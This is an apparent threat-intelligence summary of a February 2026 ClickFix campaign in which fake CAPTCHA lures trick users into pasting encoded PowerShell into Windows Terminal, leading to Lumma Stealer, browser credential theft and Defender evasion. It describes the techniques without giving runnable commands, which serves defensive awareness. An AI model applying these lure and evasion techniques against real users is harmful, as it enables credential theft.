Key Findings:

• Microsoft Defender experts uncovered a widespread ClickFix campaign exploiting Windows Terminal to deliver Lumma Stealer malware.

• The campaign instructs targets to use the Windows + X → I shortcut to launch Windows Terminal (wt.exe) directly, bypassing Run-dialog detections.

• Attackers guide users to paste malicious PowerShell commands from fake CAPTCHAs, troubleshooting prompts, or verification-style lures.

• The malicious payload downloads and executes a multi-stage attack, enabling additional payloads, persistence, Defender evasion, and data exfiltration.

• The final-stage payload is a Lumma Stealer component that performs QueueUserAPC()-based code injection into Chrome and Edge processes to target browser artifacts and credentials.

Background

In February 2026, Microsoft Defender experts identified a new ClickFix social engineering campaign that leverages Windows Terminal as the primary execution mechanism, instead of the traditional Run dialog method. This approach allows attackers to bypass specific detections and blend the attack into legitimate administrative workflows, making it appear more trustworthy to users.

Windows Terminal Exploitation

Rather than instructing targets to launch the Run dialog (Win + R) and paste a command, this campaign guides users to use the Windows + X → I shortcut to open Windows Terminal (wt.exe) directly. This creates a privileged command execution environment that blends into routine Windows administration tasks, making the attack seem more legitimate.

Malicious Payload Delivery

Users are tricked into pasting a hex-encoded, XOR-compressed command into the Windows Terminal session, which spawns additional Terminal/PowerShell processes to decode the script. This leads to the download and extraction of a multi-stage payload, including a renamed 7-Zip binary and a ZIP file containing further malicious components.

Lumma Stealer Deployment

The final-stage payload deployed to C:\ProgramData\app_config\ctjb is identified as a Lumma Stealer component. It uses QueueUserAPC()-based code injection to target Chrome and Edge processes, allowing the stealer to harvest high-value browser artifacts, such as stored credentials, and exfiltrate them to attacker-controlled infrastructure.

Attack Chain Evasion

The ClickFix campaign also features techniques to evade detection, including configuring Microsoft Defender exclusions and leveraging LOLBin (Living Off The Land Binaries) abuse to execute the malicious script.

Sources

• https://securityaffairs.com/189046/malware/microsoft-warns-of-clickfix-campaign-exploiting-windows-terminal-for-lumma-stealer.html

• https://thehackernews.com/2026/03/microsoft-reveals-clickfix-campaign.html

• https://www.cypro.se/2026/03/06/microsoft-reveals-clickfix-campaign-using-windows-terminal-to-deploy-lumma-stealer/

• https://www.facebook.com/thehackernews/posts/-clickfix-has-moved-to-windows-terminalmicrosoft-says-victims-are-told-to-open-w/1310957267735520/